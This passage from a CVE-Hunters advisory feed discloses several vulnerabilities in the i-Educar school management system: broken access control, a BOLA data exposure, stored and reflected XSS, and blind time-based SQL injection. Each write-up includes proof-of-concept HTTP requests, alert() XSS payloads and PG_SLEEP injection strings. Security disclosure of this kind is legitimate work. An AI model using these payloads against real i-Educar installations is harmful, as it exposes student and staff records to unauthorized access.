text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/intranet/educar_matricula_turma_lst.php?ref_cod_matricula=206<span class="err">&</span>ano_letivo=2025 </span></span><span class="line"><span class="cl">Cookie: i_educar_session=Mz9IKWGOP641g4BLkSGRnxs69wk4ChmUUxUerX19 </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"><ul><li>We could observe that we have access to the page and to the function to sign students from classes. And, this user, should not do that.</li></ul></p> <p><img src="/p/cve-2025-10072/image-2.png" width="1555" height="666" srcset="/p/cve-2025-10072/image-2_hu_d70819db70f9d571.png 480w, /p/cve-2025-10072/image-2_hu_b5fb0c0419366edd.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="233" data-flex-basis="560px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;">Broken Access Control vulnerabilities can have severe consequences, including: <ul> <li>Unauthorized access to restricted functionality;</li> <li>Escalation of privileges for low-level users;</li> <li>Exposure of sensitive data and potential system compromise;</li> <li>Loss of confidentiality and integrity of educational records;</li> <li>Reputational damage to the organization.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10072.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10072.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 07 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-10073/ https://www.cvehunters.com/p/cve-2025-10073/ <h2 id="cve-2025-10073-broken-object-level-authorization-bola-allows-enumeration-of-classes-data-via-moduleapiturma">CVE-2025-10073: Broken Object Level Authorization (BOLA) allows enumeration of classes data via <code>/module/Api/turma</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10073" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10073</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Object Level Authorization (BOLA) vulnerability was identified in the <code>/module/Api/turma</code> endpoint of the i-Educar application.This flaw allows a user without proper permissions to query the endpoint and retrieve ** class information** by manipulating request parameters.</br></br>Although this vulnerability does not directly expose individual student data, it still constitutes an <b>unauthorized disclosure of academic structure information</b>, which can be leveraged for enumeration or as a stepping stone for further attacks.</p><h2 id="cve-2025-10073-broken-object-level-authorization-bola-allows-enumeration-of-classes-data-via-moduleapiturma">CVE-2025-10073: Broken Object Level Authorization (BOLA) allows enumeration of classes data via <code>/module/Api/turma</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10073" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10073</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Object Level Authorization (BOLA) vulnerability was identified in the <code>/module/Api/turma</code> endpoint of the i-Educar application.This flaw allows a user without proper permissions to query the endpoint and retrieve ** class information** by manipulating request parameters.</br></br>Although this vulnerability does not directly expose individual student data, it still constitutes an <b>unauthorized disclosure of academic structure information</b>, which can be leveraged for enumeration or as a stepping stone for further attacks.</p> <h2 id="details">Details </h2><p style="text-align: justify;"><b>Vulnerable Endpoint:</b> <code>GET /module/Api/turma</code></br></br>The application fails to enforce <b>object-level authorization</b>when handling this endpoint. As a result, any authenticated user can manipulate the request values to access sensitive information (names, IDs, enrollment status) of students.</p> <p style="text-align: justify;"><b>Expected behavior:</b><ul><li>Only authorized roles (e.g., administrators, coordinators, teachers linked to the class) should be able to access this data.</li><li>Unauthorized users should receive 403 Forbidden or an empty response.</li></ul></p> <p style="text-align: justify;"><b>Observed behavior:</br></b><ul><li>Any authenticated user (even low-privilege accounts) can access this endpoint and retrieve sensitive information about academic classes.</li></ul></p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Authenticate as a non-privileged user (e.g., student, professor).</li></ul></p> <p><img src="/p/cve-2025-10073/image.png" width="1380" height="528" srcset="/p/cve-2025-10073/image_hu_e9ed6b29581f01dc.png 480w, /p/cve-2025-10073/image_hu_374181a535d27950.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="261" data-flex-basis="627px" /></p> <p><img src="/p/cve-2025-10073/image-1.png" width="846" height="616" srcset="/p/cve-2025-10073/image-1_hu_29ac0d2382b460d0.png 480w, /p/cve-2025-10073/image-1_hu_5d2f89eaf0785474.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="137" data-flex-basis="329px" /></p> <p style="text-align: justify;"><ul><li>Send the following request:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /module/Api/turma?&oper=get&resource=turma&id=14 HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: application/json, text/javascript, */*; q=0.01 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/intranet/educar_turma_det.php?cod_turma=14 </span></span><span class="line"><span class="cl">Cookie: i_educar_session=[low-privileged-session] </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: empty </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: cors </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Priority: u=0 </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10073/image-2.png" width="1574" height="679" srcset="/p/cve-2025-10073/image-2_hu_7058d38f59e7fa4a.png 480w, /p/cve-2025-10073/image-2_hu_e22ce1bb894a2051.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="231" data-flex-basis="556px" /></p> <p style="text-align: justify;"><ul><li>We could observe that informations about classes were returned.</li></ul></p> <h2 id="impact">Impact </h2><p style="text-align: justify;">This vulnerability is a Broken Object Level Authorization (BOLA) issue (OWASP API Top 10 - 2023, A01), allowing sensitive data exposure. Any authenticated user can access personal information of other users. This can lead to: <ul> <li>Unauthorized access to sensitive PII;</li> <li>Violation of data protection laws (e.g., LGPD, GDPR);</li> <li>Potential abuse of user data or impersonation;</li> <li>User enumeration.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10073.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10073.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 07 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-10074/ https://www.cvehunters.com/p/cve-2025-10074/ <h2 id="cve-2025-10074-multiples-cross-site-scripting-xss-stored-in-endpoint-usuariostiposid">CVE-2025-10074: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>/usuarios/tipos/(ID)</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10074" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10074</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>/usuarios/tipos/(ID)</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>Tipos de Usuário</code> and <code>Descrição</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p><h2 id="cve-2025-10074-multiples-cross-site-scripting-xss-stored-in-endpoint-usuariostiposid">CVE-2025-10074: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>/usuarios/tipos/(ID)</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10074" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10074</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>/usuarios/tipos/(ID)</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>Tipos de Usuário</code> and <code>Descrição</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet//usuarios/tipos/(ID)</code></p> <p>Parameters: <code>Tipos de Usuário</code> and <code>Descrição</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>Tipos de Usuário</code> and <code>Descrição</code> parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC-Tipo'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10074/image.png" width="968" height="556" srcset="/p/cve-2025-10074/image_hu_ec3ebce9e8efdcbd.png 480w, /p/cve-2025-10074/image_hu_29ddd785c353a757.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="174" data-flex-basis="417px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10074.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10074.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 07 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-10099/ https://www.cvehunters.com/p/cve-2025-10099/ <h2 id="cve-2025-10099-multiples-cross-site-scripting-xss-reflected-in-endpoint-educar_usuario_cadphp">CVE-2025-10099: Multiples Cross-Site Scripting (XSS) Reflected in endpoint <code>educar_usuario_cad.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10099" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10099</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_usuario_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>email</code>, <code>data_inicial</code> and <code>data_expiracao</code> parameters.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_usuario_cad.php</code></p> <p>Parameters: <code>email</code>, <code>data_inicial</code> and <code>data_expiracao</code></p> <p style="text-align: justify;">The application reflects this input directly in the response. Although the server applies sanitization before storing the data or returning it later, the payload is executed immediately in the victim’s browser upon reflection, allowing an attacker to run arbitrary JavaScript in the user’s session.</p><h2 id="cve-2025-10099-multiples-cross-site-scripting-xss-reflected-in-endpoint-educar_usuario_cadphp">CVE-2025-10099: Multiples Cross-Site Scripting (XSS) Reflected in endpoint <code>educar_usuario_cad.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10099" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10099</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_usuario_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>email</code>, <code>data_inicial</code> and <code>data_expiracao</code> parameters.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_usuario_cad.php</code></p> <p>Parameters: <code>email</code>, <code>data_inicial</code> and <code>data_expiracao</code></p> <p style="text-align: justify;">The application reflects this input directly in the response. Although the server applies sanitization before storing the data or returning it later, the payload is executed immediately in the victim’s browser upon reflection, allowing an attacker to run arbitrary JavaScript in the user’s session.</p> <h2 id="poc">PoC </h2><h3 id="payloads">Payloads: </h3><h4 id="parameter-email">Parameter <code>email</code> </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('XSS-PoC-Email')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h4 id="parameters-data_inicial-and-data_expiracao">Parameters <code>data_inicial</code> and <code>data_expiracao</code> </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">3E%3Cimg%20src%3Dx%20onerror%3Dalert('XSS-PoC3')%3E </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10099/image.png" width="1222" height="534" srcset="/p/cve-2025-10099/image_hu_bf03398d0321c99e.png 480w, /p/cve-2025-10099/image_hu_ca402a023729493e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="228" data-flex-basis="549px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10099.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10099.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 07 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-10011/ https://www.cvehunters.com/p/cve-2025-10011/ <h2 id="cve-2025-10011-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-moduletabelaarredondamentoedit-endpoint">CVE-2025-10011: SQL Injection (Blind Time-Based) Vulnerability in <code>id</code> Parameter on <code>/module/TabelaArredondamento/edit</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10011" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10011</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id</code> parameter of the <code>/module/TabelaArredondamento/edit</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p><h2 id="cve-2025-10011-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-moduletabelaarredondamentoedit-endpoint">CVE-2025-10011: SQL Injection (Blind Time-Based) Vulnerability in <code>id</code> Parameter on <code>/module/TabelaArredondamento/edit</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10011" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10011</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id</code> parameter of the <code>/module/TabelaArredondamento/edit</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>/module/TabelaArredondamento/edit</code></p> <p>Parameter: <code>id</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+'WqeR'='WqeR </span></span></code></pre></td></tr></table> </div> </div><h4 id="example-request">Example Request </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">POST /module/TabelaArredondamento/edit?id=1'+AND+7097=(SELECT+7097+FROM+PG_SLEEP(5))+AND+'WqeR'='WqeR HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl">Content-Length: 680 </span></span><span class="line"><span class="cl">Origin: http://localhost </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/module/TabelaArredondamento/edit?id=1 </span></span><span class="line"><span class="cl">Cookie: [COOKIE] </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.</p> <p><img src="/p/cve-2025-10011/image.png" width="1126" height="1006" srcset="/p/cve-2025-10011/image_hu_6843a63da889ac32.png 480w, /p/cve-2025-10011/image_hu_2a61729ca2b8044e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="111" data-flex-basis="268px" /></p> <p style="text-align: justify;">Observe the time delay in the server response, indicating the successful execution of the SQL payload.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10011.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10011.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 05 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-10012/ https://www.cvehunters.com/p/cve-2025-10012/ <h2 id="cve-2025-10012-sql-injection-blind-time-based-vulnerability-in-ref_cod_aluno-parameter-on-educar_historico_escolar_lstphp-endpoint">CVE-2025-10012: SQL Injection (Blind Time-Based) Vulnerability in <code>ref_cod_aluno</code> Parameter on <code>educar_historico_escolar_lst.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10012" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10012</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>ref_cod_aluno</code> parameter of the <code>educar_historico_escolar_lst.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>ref_cod_aluno</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p><h2 id="cve-2025-10012-sql-injection-blind-time-based-vulnerability-in-ref_cod_aluno-parameter-on-educar_historico_escolar_lstphp-endpoint">CVE-2025-10012: SQL Injection (Blind Time-Based) Vulnerability in <code>ref_cod_aluno</code> Parameter on <code>educar_historico_escolar_lst.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10012" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10012</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>ref_cod_aluno</code> parameter of the <code>educar_historico_escolar_lst.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>ref_cod_aluno</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>educar_historico_escolar_lst.php</code></p> <p>Parameter: <code>ref_cod_aluno</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">AND 6986=(SELECT 6986 FROM PG_SLEEP(5)) </span></span></code></pre></td></tr></table> </div> </div><h4 id="example-request">Example Request </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /intranet/educar_historico_escolar_lst.php?ref_cod_aluno=206+AND+6986=(SELECT+6986+FROM+PG_SLEEP(5)) HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Cookie: [COOKIE] </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: none </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.</p> <p><img src="/p/cve-2025-10012/image.png" width="1572" height="707" srcset="/p/cve-2025-10012/image_hu_988aafc9dd1fbe7.png 480w, /p/cve-2025-10012/image_hu_7d467cabf908a825.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="222" data-flex-basis="533px" /></p> <p><img src="/p/cve-2025-10012/image-1.png" width="1566" 